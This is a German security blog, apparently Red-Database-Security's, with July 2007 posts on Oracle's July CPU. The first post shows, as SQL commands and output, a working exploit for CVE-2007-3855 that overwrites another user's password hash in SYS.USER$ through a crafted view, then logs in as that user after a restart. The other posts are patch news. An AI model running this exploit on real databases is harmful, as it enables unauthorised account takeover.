22 Jul 2007 von Alexander Kornbrust.

Andrea Purificato hat auf seiner Webseite einen Exploit für das Create-View-Problem (DB17 bzw CVE-2007-3855, das von RDS an Oracle gemeldet), das mit dem Juli 2007 CPU korrigiert wurde.

In dem veröffentlichten Exploit wird über eine View das Passwort in der Tabelle SYS.USER$ mit Hilfe des Update Kommandos aktualisiert. Ganz so wie auf der Webseite beschrieben, funktioniert dieser Exploit aber dennoch nicht, da man Passworte nicht direkt (und von Oracle supported) via Update ändern kann.

Beispiel:
– Zuerst berechnen wir Offline den Passwort Hash für den Benutzer RDS und die Passworte RDS und HACKED
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB

c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9

– Im nächsten Schritt verbinden wir uns zur Datenbank und aktualisieren den Passwort-Hash über das Update Kommando
SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2    select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;

View created.
SQL> update cpu.bunkerview set password=’7B843A192FF96BE9′ where name =’RDS’;

1 row updated.

SQL> commit;

Commit complete.

– Das Passwort ist nun auf HACKED geändert worden.

SQL> select password from sys.user$ where name=’RDS’;

PASSWORD
——————————
7B843A192FF96BE9
– Aber dennoch klappt der Connect nicht…
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.

– Damit dieser Exploit zusammen mit der Passwort-Änderung funktioniert, muss man allerdings  die Datenbank neu starten. Nach dem Neustart funktioniert dann der per Update gesetzte Passwort Hash.

C:\>sqlplus rds/hacked

SQL*Plus: Release 10.2.0.3.0 - Production on Sun Jul 22 18:24:41 2007

Copyright (c) 1982, 2006, Oracle.  All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - Production
With the Partitioning, OLAP and Data Mining Scoring Engine options

SQL>

Geschrieben in Exploit, CPUJul2007, Allgemein | Drucken | 1 Kommentar »

17 Jul 2007 von Alexander Kornbrust.

Wie Eric Maurice von Oracle gerade auf dem Oracle Global Product Security Blog veröffentlicht hat, führt Oracle bei diesen CPU’s (und allen folgenden 10.2.0.4 und 11g) eine Neuigkeit ein, sogenannte “Database Napply CPUs”.

Diese Napply Patches sind in sogenannte Moleküle (molecules) aufgeteilt. Jedes Molekül ist absolut unabhängig voneinander und kann unabhängig installiert werden. Dadurch sind Patchkonflikte einfacher zu lösen.

Eine interessante Idee für alle DBAs die wegen Patchkonflikten keine vollständigen CPUs auf einer Datenbank einspielen können.

Eine Metalink Note zu diesem Thema findet sich hier.

In Zukunft wird unter DBAs wohl eher heissen: “Welche Moleküle hast Du denn installiert?”

Geschrieben in CPUJul2007, Allgemein | Drucken | Keine Kommentare »

12 Jul 2007 von Alexander Kornbrust.

Oracle hat die Vorankündigung für Oracle CPU Juli 2007 veröffentlicht. Insgesamt werden in der Oracle Datenbank 20 neue Sicherheitslücken korrigiert. Eine Korrektur ist für Oracle APEX (wurde von Red-Database-Security gemeldet) und ist bereits in Apex 3.0.1 bzw. Oracle 11g, dass 3.0.1 enthält, veröffentlicht. Welche anderen Lücken von RDS korrigiert wurden (siehe upcoming alerts von RDS), ist noch nicht bekannt.
2 Lücken sind remote ohne Benutzername und Passwort ausnutzbar.

Client-installationen sind diesmal nicht davon betroffen.

Im Oracle Application Server wurden 4 Lücken, Collabsuite 1 Fehler, E-Business-Suite 14, die restlichen Fehler sind in Peoplesoft. Die höchsten Lücken haben ein CVSS-Rating von 4.8, also relativ hoch.

Geschrieben in CPUJul2007, Oracle Security, Allgemein | Drucken | 1 Kommentar »